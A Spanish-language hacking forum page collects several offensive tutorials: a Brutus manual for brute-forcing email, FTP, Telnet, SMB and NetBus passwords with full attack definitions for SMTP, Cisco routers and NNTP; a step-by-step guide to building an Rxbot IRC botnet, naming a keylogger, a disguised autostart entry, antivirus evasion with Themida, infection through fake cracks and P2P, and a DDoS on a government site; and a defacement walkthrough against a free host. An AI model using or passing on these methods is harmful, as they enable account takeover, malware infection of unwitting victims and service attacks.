Category: manuales

Manual Brutus

Hola a todos voy a hablaros de un programa con el que deberiais familiariza-ros, ya q resulta de mucha utilidad en muchas ocasiones.

Podemos definir el Brutus como un crackeador de passwords remoto on-line, es rapido admite hasta 60 conexiones simultaneas ( cuidado con esto que puedes tirar abajo algun servicio ), puede llegar 2500 palabras por segundo << con dialup ni de coña, no es bueno excederse en esto casi regula las conexiones segun tu linea y la calidad de respuesta que te de el servidor.

Haber empecemos con lo q interesa, lo primero que haremos sera descargar el brutus Aqui bien estas son sus caracterisitic as:

Podemos utilizar el brutus para sacar passwords:

HTTP (Autentificacio n basica)
HTTP (HTLM Form/CGI)
POP3
FTP
SMB (netBIOS)
TELNET
NETBUS

Y a parte podemos configurarlo para petar un servicio que configuremos noso-tros mismos como smtp, nntpd etc entre sus caracteristica s cabe destacar la posibilidad de usar un proxy sock(v4) sock(v4.1) y sock(5), puedes encontrar proxies en http://www.atomintersoft.com/products/alive-proxy/proxy-list/ a veces muchos servicios

Tambien dispone de un generador de diccionarios bastante completo, en Tools >> Wordlist Generator, veamos las opciones que tiene:

Convert list (LF>CRLF) – convierte una lista de palabras en formato unix a formato dos cambiando los saltos de linea,para usarlo selecionaremos la lis-ta en estilo unix en “input list” y en “output list” el nombre de la lista de salida que queremos.

Only word length – con esta opcion lo q hacemos es coger de una lista de pa-labras las quekeramos en funcion de su longitud definiremos el numero de ca-acteres en word lenght y selecionaremos la lista que keremos en input list y la de salida en output.

Remove duplicates – esta opcion lo q hace es copiar la lista de entrada a la q keramos eliminando las palabras duplicadas.

Permutations – esta opcion realiza cualquier tipo de permutaciones sobre una determinada lista de palabras añadiendo mayusculas minusculas invirtiendo la palabra… solo es usar la permutacion q mas nos interese.

Create new list Рcon esta opcion ya no necesitamos una lista de entrada simplemente crearemos una con los parametros que queramos donde definiremos el numero de caracteres y las permutaciones como en el apartado anterior ademas tenemos la opcion de seed word q lo q hace es q nosotros a̱adimos unas palabras y vea la lista utilizando esos caracteres.

Create new list for user – aki crearemos una nueva lista en la ke ademas podremos poner un nombre de usuario del cual partira el programa

Create new list for users – esta es igual que la anterior pero podemos selecionar una lista q tengamos con usuarios en input list para q cree la lista en base a esos users.

Podemos utilizar varios metodos de autentificacio n tanto para el modo de password como para el modo de usuario:

En Authentication Options: El modo de identificacion del usuario siempre es el mismo para todos los metodos de ataque que explicaremos detenidamente, hay dos modos como podras observar “Use Username” el cual usa un diccionario y va probando uno a uno, o “Single User” que sirve para usar un solo login, el de la victima y con ese login probara todos los pass mediante los metodos que vamos a ver ahora.

NOTA: He visto el diccionario de users.txt es pequeñito aqui os lo planto Admin

administrator
test
guest
root
backup

Bueno respecto a servicios ftp estos nombres de usuarios y alguno mas se les deniega el acceso como login , bueno esto esta en /etc/ftpusers en un proftp, pero asi suele venir en muchos servicios ftp segun los instalas
root
bin
daemon
adm
lp
sync
shutdown
halt
mail
news
uucp
operator
games
nobody

Este archivo puede modificarse,simplemente con añadir + usuarios a quien deniegen el acceso y todo depende de quien lo administre, bueno ahora veamos lo distintos modos de ataque.

Para usar distintos metodos de ataque solo tienes que seleccionar en “Pass Mode” y coger el ataque que mas te convenga Word list “Ataque por diccionario”:No pienses que estamos hablando de el larouse, si no de una simple lista de palabras, que nos pueden ahorrar trabajo a diferencia de otros metodos como el brute force ,. para seleccionar el diccionario solo tienes que ir a Browse y escogerlo Combo list: Para este tipo de ataque tambien se necesita un diccionario, si la diferencia con el de arriba es que combinan las palabras del diccionario separadas por “:” “_”,

ej guest:password ver example-combo.txt

Brute force “Ataque por fuerza bruta”,este ataque trata de sacar el pass mediante combinaciones de “letras, numeros, caracteres especiales” esto puedes personalizarlo he incluso limitar el numero de caracteres, cuando seleccionas este metodo aparece el boton “Range” cuando calcas este se abre un menu “Brute Force Generation”, en el cual hay varias opciones:

Digits Only: Solo numeros
Lowercase Alpha: Solo minusculas
Uppercase Alpha: Solo mayusculas
Mixed Alpha: combinacion de mayusculas y minusculas
Alphanumeric: abcd….z
Full Keyspace: Prueba con espacios por ej: Pepe 12
Custom Range: Ahi puedes meter los caracteres que quieras
Min Length: Seleccionas el numer o de caracteres minimo que podra tener elpass
Max Length : Aqui seleccionas el numero de caracteres maximo que comprobara

2. Elección de servicio a atacar
Las 2 primeras opciones HTTP se utilizan para entrar en esas paginas que al intentar acceder nos sale una ventana pidiendo login y pass utilizaremos uno u otro dependiendo del tipo de autentificacio n que rekiera dicha web lo comprobaremos probando con ambos tipos., las HTTP “CGI application authentication” son las que usan programas CGIs, para autentificarse, ( podeis mirar el articulo de Problemas con los CGIs de NORTH que comenta un poco que son los cgis etc). Para utilizarlos no hay mas que poner en target por ej: www.victima.co m o victima.com y seleccionar en autentificatio ns options use username y pass mode el metodo ke mas nos convenga como norma general usaremos en este tipo de webs un dicionario del idioma en el ke este dicha web.

Esto es util sobre todo para esas webs xxx en las q rekieren ser socio para entrar claro esta q no sacaremos nada util de ellas unke estareis un rato entretenidos xDD.

POP3 bueno esto ya es algo mas interesante usaremos esta opcion para petar cuentas de correo de servidores q tenga pop3 activo. Selecionamos POP3 y en target escribimos POP3.victima.c om por ejemplo:

(pop3.terra.es) o en su caso la ip, en autentificatio n options marcamos use username y single user, y escribiremos en la casilla de userid victima.terra. es si la cuenta de la victima es (victima@terra.es). Lo escribiremos con punto(.) no arroba(@) y de nuevo usaremos el modo de pass q mas nos interese ya sea dicc, combo o brute force.

Bueno pasemos al ftp aunque como vereis la rutina es parecida en todos los tipos rekieren pequeñas variaciones en cada uno de ellos. En este caso nos convendra tener un nombre de usuario del que trataremos de sacar el pass aun q tambien podemos buscar nombres de usuario al azar, lo cual logicamente nos llevara mucho tiempo. Selecionamos type ftp y si tenemos un nombre de usuario marcaremos use username y single user escribiremos el nombre de usuario por ej: pardillo y selecionaremos el metodo dicc,combo… si no tenemos nombre de usuario selecionamos un diccionario y marcamos solo la casilla useusername.

TELNET – pues es facil lo haremos igual que con un ftp pero selecionando type telnet claro esta .

SMB (netBIOS) bueno aki tenemos otro servicio del cual tb podemos sacar provecho usando el brutus si es q esta protegido, cuanta gente piensa que este servicio lo dan solo maquinas con win lo habre oido mil veces, “na tio es un win tiene el 139 abierto” ,cuando hablamos de SMB”Server Message Block “SMB es un protocolo idea de IBM mientras desarrollaban un sistema basico de E/S para LANS, que luego se llamo NetBIOS, sobre el que luego IBM implemento una interfad mejorada de usuario, llamada NetBEUI. NetBIOS se puede transportar sobre diferentes protocolos de red: NetBEUI,IPX/SPX y TCP/IP, etc. tb se pueden ofrecer este servicio en otros sistemas unices, OS/2, BeOS etc, la unica cosa q tendremos q tener en cuenta a la hora de realizar nuestro atake, en target escribimos la ip de la victima selecionamos type SMB(netBIOS) y ahora en SMB options si se trata de una makina NT escribiremos el nombre del dominio si es solo un pc con win2 9x no marcaremos esta opcion, a continuacion en autentificacio n options ya sabeis selecionaremos use username y el modo de pass q mas nos convenga.

NETBUS – he aki otra utilidad por si olvidamos el pass de alguna victima de netbus o simplemente queremos entrar en alguna que hemos encontrao y esta protegida con pass. Si conoceis este troyano sabreis que cuando lo proteges con pass para entrar solo se rekiere el pass no el login, por eso al seleccionar type netbus no podemos selecionar en autentificatio ns options la opcion de use username o single user si no q solo podemos selecionar la opcion de pass (dicc, combo list …) pues eso haremos lo cual no tiene mayor complicacion.

Ya hemos visto los types q trae el brutus de serie pero no nos vamos a kedar ahi, tb podemos crear nuevos types es decir preparar el brutus para q se conecte a un determinado servicio usando unas determinadanas instruciones q pondremos en el archivo q hagamos.

Ahora os voy a poner un ejemplo de como preparar nuevos types vamos a ver uno para (smtp_verificac ion_de_usuario ), en la web oficial podeis encontrar alguno, te preguntaras como se hacen pues simplemente viendo como verifica el servicio el nombre del usuario y la pass, o en algunos casos solo las pass, para ello puedes ayudarte un sniffer, netcat o cualquier cliente de telnet ya hablaremos de estas utilidades o utilidades parecidas en siguientes ezines.

Seria asi:

/———————-empieza_codigo—-copiar_desde_aki——–/

[Brutus Application Definition]
Version=AET2
Target=
Port=25
UseUserID=0
userprompt=login
passprompt=passwd
RespString=
HTTPRequestTyp e=POST
useHTTPKeepAli ve=1
posResponse=0
IsTelnet=0
IsHTTP=0
IsSMB=0
maPrimaryRespo nseIsPositive=0
maSecondaryRes ponseIsPositiv e=0
maPrimaryRespo nseAction=13
maSecondaryRes ponseAction=13
maUserPrefix=””
maUserPostfix=””
maPassPrefix=”VRFY ”
maPassPostfix=””
maUsePreAuth=1
maMaxAuthsConx=0
HTTPFormFieldU pdate=0
HTTPUseCookies=1
HTTPCookieUpda te=1
HTTPReferer=
CookieNames1=
CookieValues1=
CookieNames2=
CookieValues2=
CookieNames3=
CookieValues3=
CookieNames4=
CookieValues4=
maauthStageStr ings1=””
maauthReadLeng th1=1
maauthSendPost fix1=None
HTTPFormFields 1=
HTTPFormFieldV alues1=
maauthStageStr ings2=”220″
maauthReadLeng th2=1
maauthSendPost fix2=None
HTTPFormFields 2=
HTTPFormFieldV alues2=
maauthStageStr ings3=”HELO .”
maauthReadLeng th3=1
maauthSendPost fix3=CR+LF
HTTPFormFields 3=
HTTPFormFieldV alues3=
maauthStageStr ings4=””
maauthReadLeng th4=1
maauthSendPost fix4=None
HTTPFormFields 4=
HTTPFormFieldV alues4=
maauthStageStr ings5=””
maauthReadLeng th5=1
maauthSendPost fix5=None
HTTPFormFields 5=
HTTPFormFieldV alues5=
maauthStageStr ings6=””
maauthReadLeng th6=1
maauthSendPost fix6=None
HTTPFormFields 6=
HTTPFormFieldV alues6=
maauthStageStr ings7=””
maauthReadLeng th7=1
maauthSendPost fix7=None
HTTPFormFields 7=
HTTPFormFieldV alues7=
maauthStageStr ings8=””
maauthReadLeng th8=1
maauthSendPost fix8=None
HTTPFormFields 8=
HTTPFormFieldV alues8=
maauthStageStr ings9=””
maauthReadLeng th9=1
maauthSendPost fix9=None
HTTPFormFields 9=
HTTPFormFieldV alues9=
maauthStageStr ings10=””
maauthReadLeng th10=1
maauthSendPost fix10=None
HTTPFormFields 10=
HTTPFormFieldV alues10=
maauthStageStr ings11=””
maauthReadLeng th11=1
maauthSendPost fix11=None
HTTPFormFields 11=
HTTPFormFieldV alues11=
maauthStageStr ings12=”250″
maauthReadLeng th12=1
maauthSendPost fix12=None
HTTPFormFields 12=
HTTPFormFieldV alues12=
maauthStageStr ings13=””
maauthReadLeng th13=1
maauthSendPost fix13=CR+LF
HTTPFormFields 13=
HTTPFormFieldV alues13=
maauthStageStr ings14=”550″
maauthReadLeng th14=1
maauthSendPost fix14=None
HTTPFormFields 14=
HTTPFormFieldV alues14=
maauthStageStr ings15=”252″
maauthReadLeng th15=1
maauthSendPost fix15=None
HTTPFormFields 15=
HTTPFormFieldV alues15=
maauthStageStr ings16=””
maauthReadLeng th16=1
maauthSendPost fix16=None
HTTPFormFields 16=
HTTPFormFieldV alues16=

/————————fin_de_codigo—–copiar_hasta_aki———/

ara utilizar este codigo crearemos un archivo bad pegaremos en el el codigo y lo guardamos con el nombre q keramos por ej: smtp_b_auth.ba d una vez guar dado solo hay que ir a File > Import Service y seleccionar el type, estos types los puedes configurar en Modify Sequence tb, ahi puedes cambiarlo a tu gusto el metodo o la forma de autentificacio n, tiempo de espera etc , lo guardas con la configuracion que tu quieras en File > Export Service.

Este type lo ke hace es utilizar el comado VRFY “verify” (utilizado para verificar el nombre del usuario) que aunke suele estar desactivado en muchos server debido a que puede revelar informacion tambien otro comando que puede revelar informacion es EXPN (expand) sirve para indicar como se va a resolver la dirección de correo del RCPT que le indiquemos, aunque sea antiguo todavia hay algunos en los que no lo esta desactivado y lo que nos permitira es comprobar utilizando una lista o dicc de users comprobar cuales estan utlizados o no.

Veamos otro para atakar el password en un router CISCO

/———————-empieza_codigo—-copiar_desde_aki——–/

[Brutus Application Definition]
Version=AET2
Target=
Port=23
UseUserID=0
userprompt=
passprompt=
RespString=
HTTPRequestTyp e=GET
useHTTPKeepAli ve=1
posResponse=0
IsTelnet=1
IsHTTP=0
IsSMB=0
maPrimaryRespo nseIsPositive=0
maSecondaryRes ponseIsPositiv e=0
maPrimaryRespo nseAction=13
maSecondaryRes ponseAction=5
maUserPrefix=””
maUserPostfix=””
maPassPrefix=””
maPassPostfix=””
maUsePreAuth=1
maMaxAuthsConx=0
HTTPFormFieldU pdate=0
HTTPUseCookies=1
HTTPCookieUpda te=1
HTTPReferer=
CookieNames1=
CookieValues1=
CookieNames2=
CookieValues2=
CookieNames3=
CookieValues3=
CookieNames4=
CookieValues4=
maauthStageStr ings1=””
maauthReadLeng th1=1
maauthSendPost fix1=None
HTTPFormFields 1=
HTTPFormFieldV alues1=
maauthStageStr ings2=”Password:”
maauthReadLeng th2=1
maauthSendPost fix2=None
HTTPFormFields 2=
HTTPFormFieldV alues2=
maauthStageStr ings3=”cisco”
maauthReadLeng th3=1
maauthSendPost fix3=CR+LF
HTTPFormFields 3=
HTTPFormFieldV alues3=
maauthStageStr ings4=”>”
maauthReadLeng th4=1
maauthSendPost fix4=None
HTTPFormFields 4=
HTTPFormFieldV alues4=
maauthStageStr ings5=”enable”
maauthReadLeng th5=1
maauthSendPost fix5=CR+LF
HTTPFormFields 5=
HTTPFormFieldV alues5=
maauthStageStr ings6=””
maauthReadLeng th6=1
maauthSendPost fix6=None
HTTPFormFields 6=
HTTPFormFieldV alues6=
maauthStageStr ings7=””
maauthReadLeng th7=1
maauthSendPost fix7=None
HTTPFormFields 7=
HTTPFormFieldV alues7=
maauthStageStr ings8=””
maauthReadLeng th8=1
maauthSendPost fix8=None
HTTPFormFields 8=
HTTPFormFieldV alues8=
maauthStageStr ings9=””
maauthReadLeng th9=1
maauthSendPost fix9=None
HTTPFormFields 9=
HTTPFormFieldV alues9=
maauthStageStr ings10=””
maauthReadLeng th10=1
maauthSendPost fix10=None
HTTPFormFields 10=
HTTPFormFieldV alues10=
maauthStageStr ings11=””
maauthReadLeng th11=1
maauthSendPost fix11=None
HTTPFormFields 11=
HTTPFormFieldV alues11=
maauthStageStr ings12=”Password:”
maauthReadLeng th12=1
maauthSendPost fix12=None
HTTPFormFields 12=
HTTPFormFieldV alues12=
maauthStageStr ings13=””
maauthReadLeng th13=1
maauthSendPost fix13=CR+LF
HTTPFormFields 13=
HTTPFormFieldV alues13=
maauthStageStr ings14=”Password:”
maauthReadLeng th14=1
maauthSendPost fix14=None
HTTPFormFields 14=
HTTPFormFieldV alues14=
maauthStageStr ings15=”% Bad passwords”
maauthReadLeng th15=1
maauthSendPost fix15=None
HTTPFormFields 15=
HTTPFormFieldV alues15=
maauthStageStr ings16=””
maauthReadLeng th16=1
maauthSendPost fix16=None
HTTPFormFields 16=
HTTPFormFieldV alues16=

/————————fin_de_codigo—–copiar_hasta_aki———/

Veamos otro mas para atakar el metodo de autentificacio n que usan los servidores que proporcionan servicios nntpd “Network News Transfer Protocol”, como podras observar en el codigo usa el puerto 119

/———————-empieza_codigo—-copiar_desde_aki——–/

[Brutus Application Definition]
Version=AET2
Target=
Port=119
UseUserID=1
userprompt=
passprompt=
RespString=
HTTPRequestTyp e=POST
useHTTPKeepAli ve=0
posResponse=0
IsTelnet=0
IsHTTP=0
IsSMB=0
maPrimaryRespo nseIsPositive=0
maSecondaryRes ponseIsPositiv e=1
maPrimaryRespo nseAction=0
maSecondaryRes ponseAction=0
maUserPrefix=”AUTHINFO USER ”
maUserPostfix=””
maPassPrefix=”AUTHINFO PASS ”
maPassPostfix=””
maUsePreAuth=0
maMaxAuthsConx=0
HTTPFormFieldU pdate=0
HTTPUseCookies=1
HTTPCookieUpda te=1
HTTPReferer=
CookieNames1=
CookieValues1=
CookieNames2=
CookieValues2=
CookieNames3=
CookieValues3=
CookieNames4=
CookieValues4=
maauthStageStr ings1=””
maauthReadLeng th1=1
maauthSendPost fix1=None
HTTPFormFields 1=
HTTPFormFieldV alues1=
maauthStageStr ings2=””
maauthReadLeng th2=1
maauthSendPost fix2=None
HTTPFormFields 2=
HTTPFormFieldV alues2=
maauthStageStr ings3=””
maauthReadLeng th3=1
maauthSendPost fix3=None
HTTPFormFields 3=
HTTPFormFieldV alues3=
maauthStageStr ings4=””
maauthReadLeng th4=1
maauthSendPost fix4=None
HTTPFormFields 4=
HTTPFormFieldV alues4=
maauthStageStr ings5=””
maauthReadLeng th5=1
maauthSendPost fix5=None
HTTPFormFields 5=
HTTPFormFieldV alues5=
maauthStageStr ings6=””
maauthReadLeng th6=1
maauthSendPost fix6=None
HTTPFormFields 6=
HTTPFormFieldV alues6=
maauthStageStr ings7=””
maauthReadLeng th7=1
maauthSendPost fix7=None
HTTPFormFields 7=
HTTPFormFieldV alues7=
maauthStageStr ings8=””
maauthReadLeng th8=1
maauthSendPost fix8=None
HTTPFormFields 8=
HTTPFormFieldV alues8=
maauthStageStr ings9=””
maauthReadLeng th9=1
maauthSendPost fix9=None
HTTPFormFields 9=
HTTPFormFieldV alues9=
maauthStageStr ings10=”200″
maauthReadLeng th10=1
maauthSendPost fix10=None
HTTPFormFields 10=
HTTPFormFieldV alues10=
maauthStageStr ings11=””
maauthReadLeng th11=1
maauthSendPost fix11=CR+LF
HTTPFormFields 11=
HTTPFormFieldV alues11=
maauthStageStr ings12=”381″
maauthReadLeng th12=1
maauthSendPost fix12=None
HTTPFormFields 12=
HTTPFormFieldV alues12=
maauthStageStr ings13=””
maauthReadLeng th13=1
maauthSendPost fix13=CR+LF
HTTPFormFields 13=
HTTPFormFieldV alues13=
maauthStageStr ings14=”502″
maauthReadLeng th14=1
maauthSendPost fix14=None
HTTPFormFields 14=
HTTPFormFieldV alues14=
maauthStageStr ings15=”281″
maauthReadLeng th15=1
maauthSendPost fix15=None
HTTPFormFields 15=
HTTPFormFieldV alues15=
maauthStageStr ings16=””
maauthReadLeng th16=1
maauthSendPost fix16=None
HTTPFormFields 16=
HTTPFormFieldV alues16=

/————————fin_de_codigo—–copiar_hasta_aki———/

3. Para acabar
Quiero recomendaros que siempre q engacheis el brutus a alguna victima no lo hagais directamente recomiendo q useis un proxy, o cualkier otro metodo para mantener el anonimato pq todos los intentos q hagais kedaran logeados.

Bueno creo q no me dejo nada espero que os resulte util esta explicaion y si no pos a joderse xDD.

Podeis reanudar vuestro “ataque”: el brutus guarda el utlimo ataque en autosave.bru, puedes reanudarlo solo con ir a File > Load Session, asi como guardar tus ataques en Save Session con el nombrequequier as.bru.

MANUAL: Crear botnet usando Rxbot

Explicación hecha por RaKi0N, Manual hecho por xXDarkXx:

¿Qué es una botnet?

Una botnet es una red normalmente organizada por “hackers” para cometer fraudes en internet, como ataques DoS o DDoS.

¿Cómo actúan?

Estos bots son manejados por humanos a la vez que se manejan por IRC con comandos y actuan de forma semiautónoma, estos bots son personas que en su equipo se ha infectado por un “Troyano” capaz de convertir su máquina en un uso para el hacker que diseñó la botnet

¿Qué tipos de botnet hay?

-Están las botnet serias, que catalogamos que lo usan para tirar páginas con contenido erótico, o usadas por hackers para beneficio propio

-Están las botnet para los lammers, si si, aquellos que las usan para joder y reirse de otros diciendo “tengo botnet” y con ello viven feliz.

¿Qué tipos de troyanos hay para crear botnet?

Troyanos están:

-Rxbot, que es el cual con el que está hecho este manual

-RvBot (no lo he probado pero bueno)

-AgoBot otro bot totalmente la hostia, si si, la hostia

Y muchos más bots que con su compilación podemos hacer la botnet.

1. INTRODUCCIÓN

Este documento ha sido escrito en términos de ayuda para las personas que empiezan a manipular los rbots , urxbots, y demás derivados. Se explicará la manera de compilarlos, configurarlos, infectar, y si posees conocimientos de c++, puedes agregarles más funciones.
Para fines de este artículo se va a usar un código llamado xBot.

2. REQUISITOS

· Necesitas tener instalado la versión del visual c++ 6.0 en inglés (recomendado).
· Instalar el Service Pack 6 para el Visual C++ 6.0.
· Instalar PSDK-x86
· El código del xBot:

Código:
· El themida
· Ganas y atención J

3. PREPARANDO NUESTRO VISUAL C++ 6.0

Ahora empezamos con lo que nos interesa, vamos a seguir los pasos siguientes:

1. Instalar el Visual C++ 6.0
2. Instalar el Service Pack 6 para el Visual C++ 6.0, que se encuentra en la carpeta Vs6sp6 y PSDK-x86 y se llama Vs6sp6. [Lo descomprimimos en una carpeta que puede ser c:\vs6sp6 y luego dentro de la misma ejecutamos el setupsp6 de instalación.]
3. Luego instalar el PSDK-x86, que también está incluido en la carpeta Vs6sp6 y PSDK-x86 y se llama PSDK-x86. [Esto toma un cierto tiempo digamos unos 30 minutos dependiendo de tu conexión a Internet].
4. Ahora vamos a configurar el Visual C++ 6.0 para compilar el xBot:

· Abrimos el Visual C++ 6.0 y nos vamos a la pestaña: Tools —> Options

5. En la parte de Options, nos vamos a la pestaña Directories y hacemos clic donde indica la flechita.

6. Luego miramos en la parte de Show directories for: Incluye Files (Y para qué?. Pues ahi no solo dice Include Files sino también Library Files, Source Files y debemos configurar para esos 3 directorios el PDSK) y al abrirse la nueva ventana le damos clic en los … para buscar la carpeta INCLUDE que instalo PSDK-x86. En mi caso se encuentra en C:\Archivos de programa\Microsoft Platform SDK\Include y pulsamos OK.

7. Ahora debemos colocar el C:\Archivos de programa\Microsoft Platform SDK\Include, en la primera línea usando las flechitas y debe quedarnos asi:

8. Hasta ahí solo hemos configurado la parte de Include files, se necesita hacer lo mismo para Library files y luego para Source files.
Se hace de la misma manera que Includes Files en este caso se tendrá que seleccionar Library files y buscar la ruta y luego colocarla en la primera línea lo mismo para Source files.
Executable files no se toca.
· Para Library files la ruta en mi caso fue:
C:\ARCHIVOS DE PROGRAMA\MICROSOFT PLATFORM SDK\LIB

· Para Source files la ruta fue:
C:\ARCHIVOS DE PROGRAMA\MICROSOFT PLATFORM SDK\SRC

Y luego OK

Luego de hacer esos 8 pasos tan detallados, es hora de compilar el xBot y configurarlo.

4. COMPILANDO Y CONFIGURANDO EL XBOT

En esta parte, se verá la manera de abrir el xBot y luego trabajar con la configuración.

4.1 Abriendo un Workspace

Abre el Visual C++ 6.0 y sigue el gráfico: Clic en File à Open Workspace

4.3 Compilando:

Ahora luego de cargar el proyecto, vamos a la pestaña Build à Rebuild All

4.4 Verificando errores

Si por algún motivo tienes errores, verifica los pasos anteriores de configuración del visual c++ 6.0 con el sp6 o el PSKD-x86

Ya tenemos todo casi listo pero nos falta saber dónde se guarda el ejecutable que acabamos de construir.

4.5 Buscando el Ejecutable

Por defecto el ejecutable que construimos se encuentra en la carpeta Release (No Ejecutarlo)

Ahora que ya tenemos los conocimientos de cómo configurar el visual c++ 6.0, de construir el ejecutable del xBot, es hora se configurarlo y explicar un poco en qué consiste.

4.6 Configurando el xBot a un determinado servidor y Canal de IRC

Esta es la parte principal de nuestro xBot y vamos a explicar como configurar:

· Lo primero es ir a la carpeta Header’s y luego al archivo configs.h, haciendo doble clic.
· En la parte derecha vemos lo siguiente:



char botid[] = “”; // bot id
char version[] = “”; // Bots !version reply
char password[] = “”; // bot password
char server[] = “”; // serverchar serve
rpass[] = “”; // server password
char channel[] = “”; // channel that the bot should join
char chanpass[] = “”; // channel password
char server2[] = “”; // backup server (optional)
char channel2[] = “”; // backup channel (optional)
char chanpass2[] = “”; // backup channel password (optional)
char filename[] = “bling.exe”; // NO CAMBIAR ESTO
char keylogfile[] = “”; // keylog filename
char valuename[] = “”; // value name for autostart
char nickconst[] = “”; // first part to the bot’s nick
char szLocalPayload File[]=””; // Payload filename
char modeonconn[] = “”; // Can be more than one mode and contain both + and -
char exploitchan[] = “”; // Channel where exploit messages get redirected
char keylogchan[] = “”; // Channel where keylog messages get redirected
char psniffchan[] = “”;

Aquí es donde vamos a configurar:

Botid[] = “rbot” ; ß Sin comentarios

Version[]= “2006”; ß Sin comentarios

Password[]= “peruvianrlz”;

· Esto sirve para que cuando este en el canal lo pueda llamar asi: .login peruvianrlz [Esto es la manera de llamar a la máquina zombie en el canal de irc. La documentación de uso del xBot esta en la carpeta DOCUMENTOS]

Server[]=”irc.loquerias”;

· Aca estoy diciendole al bot a que servidor debería entrar cuando sea ejecutado por la víctima.

Serverpass[]=”clave_del_server”;

· Si el servidor posee una contraseña aca le colocamos.

Channel[]=”#peru”;

· Aca especificamos el canal a donde se ira la maquina que ejecute el xbot

Channelpass[]=”clave_del_canal”;

· Lógicamente especificamos la clave del canal si este posee una

Veamos un ejemplo de cómo debe queda configurado:

char botid[] = “DiE”; // bot id
char version[] = “[rxBot v0.6.6a "; // Bots !version reply
char password[] = “fucku”; // bot password
char server[] = “irc.server.net”; // server
char serverpass[] = “”; // server password
char channel[] = “#peruvian”; // channel that the bot should join
char chanpass[] = “”; // channel password
char server2[] = “”; // backup server (optional)
char channel2[] = “”; // backup channel (optional)
char chanpass2[] = “”; // backup channel password (optional)
char filename[] = “bling.exe”; // NO CAMBIAR ESTO
char keylogfile[] = “system.txt”; // keylog filename
char valuename[] = “Microsoft Update Machine”; // value name for autostart
char nickconst[] = “[Rlz]-”; // first part to the bot’s nick
char szLocalPayload File[]=”msconfig.dat”; // Payload filename
char modeonconn[] = “+n+U”; // Can be more than one mode and contain both + and -char exploit
chan[] = “#peruvian “; // Channel where exploit messages get redirected
char keylogchan[] = “#peruvian “; // Channel where keylog messages get redirected
char psniffchan[] = “#peruvian “;

Ahora que ya configuramos el configs.h , podemos construir el ejecutable Build à Rebuild All

5. PROTEGIENDO NUESTRO XBOT DE LOS ANTIVIRUS

Ahora que ya tenemos nuestro ejecutable debemos hacerlo indetectable ante los antivirus y una herramienta que me está dando resultados es: THEMIDA

Hacemos clic donde nos indica la flecha y buscamos nuestro ejecutable, que se encuentra en la carpeta Release y luego le damos clic en el candadito que dice Protect

Cerramos el Themida y ya tenemos nuestro xBot protegido contra las búsquedas heuríticas de algunos antivirus.

6. INFECTANDO Y BUSCANDO VÍCTIMAS

Siempre en este mundo de tecnologías y muchas computadoras existe algo que se llama ingenio, es por eso que daré algunos consejos antes de empezar a infectar.

· Ya tienes todo listo para darle a algún amigo el ejecutable y que este lo ejecute en su computador.
· Es necesario que entiendas algunas cosas como por ejemplo char server[] = “irc.server.net”;, todas las máquinas que ejecuten su código siempre irán a ese servidor, pero que sucedería si ese servidor cierra?, se perderán todas tus rbots (máquinas infectadas).
· Para eso es necesario no colocar el nombre de un servidor en especial sino de un DNS ejemplo: peru.dns.com. y ¿por qué?
· Pues porque con un dns (http://www.cdmon.com/) , vas a tener localizados a todos tus bots. Ejemplo: si quieres meter tus bots a un servidor: irc.server3.ne t, lo único que tendrías que hacer es ir a tu cliente dns y ponerle el ip del servidor de irc y automáticamente tus bots se van a meter al servidor irc.server3.ne t y luego al canal que configuraste en tu xBot, ejemplo #peruvian.
· Las formas de infección son de acuerdo al ingenio que poseas, una forma es camuflando el rbot con otros ejecutables como x ejemplo con un instalador, con un crack de algún programa y compartirlo por el emule, etc.
· Otra forma es crear un virus que se reprodusca por p2p y agarre el codigo de tu rbot dentro del mismo J
· Lo demás va por cuenta tuya.

7. ANALIZANDO UN XBOT

Junto al artículo puse un video de cómo un conjunto de computadoras en un determinado servidor y canal de IRC, hacen el llamado flood a una página importante del Perú (www.reniec.gob .pe)

La documentación de los comandos del xBot, va incluidos junto al artículo y explicados detenidamente su uso.

Hasta el momento se dio el primer paso para que empiecen a manipular los rBots y jugar un poco con ellos. Espero que este pequeño y detallado tutorial como primera parte les sirva a muchos. No olviden que la documentación de el xBot tiene todos los comandos a usar en el irc.
Otra cosa muy importante si tienes conocimientos de C++, puedes leer las referencias bibliográficas que te ayudarán mucho a entender el código y poder modificarlo a tu gusto.
Espero poder continuar con el segundo tutorial y de la misma manera que los xBots explicarles detalladamente el proceso de configuración, compilación e infección.

Este manual no ha sido creado por RaKi0N.
Posteé este manual para todo aquel que quiera aprender y aportar Smiley

Nota: Descargar Rxbot

Saludos! 

hackear webspacemania (gratishost)

Como hackear webs de gratishost aqui un pequeño manual.

- – – – Defacear Gratishost – – – -

Defacear webs en gratishost es extramadamente sencillo,no hace falta saber mucho para hackearlas,solamente se necesita un poco de paciencia y las herramientas adecuadas
Y pongo este metodo en especial para mofarme aun mas de estos tipos,ya que menospreciaron el metodo de crackeo por fuerza bruta y ya ven lo que les paso xD.

1.-Primero necesitamos sacar el nombre de usuario ,para esto simplemente basta con provocar un error en la pagina en este caso como tenian un script en php que daba la ip del visitante,entonces basta usar el achilles para falsear nuestra ip ,para configurar el achilles tenemos que poner nuestro navegador para que use proxy con la direccion 127.0.0.1 y el puerto 5000

Cuando veamos que sale el script que pide la ip ponemos algo como esto *? $ipfalsa ?* (substituye * por < y >)de esa forma lograremos ejecutar un error en el script,y para que es esto?? pues para obtener el preciado nombre de usuario
Parse error: parse error, unexpected T_FOR, expecting ‘,’ or ‘;’ in /home/virtual/sitio19239/www/index.php on line 8
Perfecto ahora ya tenemos la ruta y por lo tanto el nombre de usuario es admin19239 (solo hay que cambiar la palabra sitio por admin)
Ahora solo nos falta la contraseña y estaremos dentro Sonrisa,ahora es cuando agradecemos a gratishost que solamente permita contraseñas maximo de 7 caracteres

2.-Ponemos a funcionar el FTP Cracker (o cualquiera que tengas a la mano,el brutus si quieres jajaj) configuramos de la siguiente forma

Nota. Si quieres podes usar el FTP Cracker.
Y gracias a que solo tenemos que buscar el rango de 4 a 7 caracteres el password sale bastante rapido a mi me llevo alrededor de 4 horas,con un password de 6 caracteres,si tienes paciencia con 1 dia maximo sacas la contraseña
El siguiente paso simplemente fue verificar que la contraseña del ftp era la misma que la redireccion de .tk (vaya imbeciles) y con esto lograomos el objetivo.

manual hackear php-nuke

Tutorial para hackear phpnuke donde explica detalladamente:

Como usar el bug
Explotar el bug
conseguir la contraseña del admin (hash)
Crackear la contraseña
Acceder al panel de control.

Como hackear una web

Bueno aki les dejo un manual de muxa utilidad. extraido de Foro pOrtal Hacker 

  COMO HACKEAR PÁGINAS WEB por Philber

Bien.. seguro que este es uno de los puntos que más interesa a los hackers novatillos…
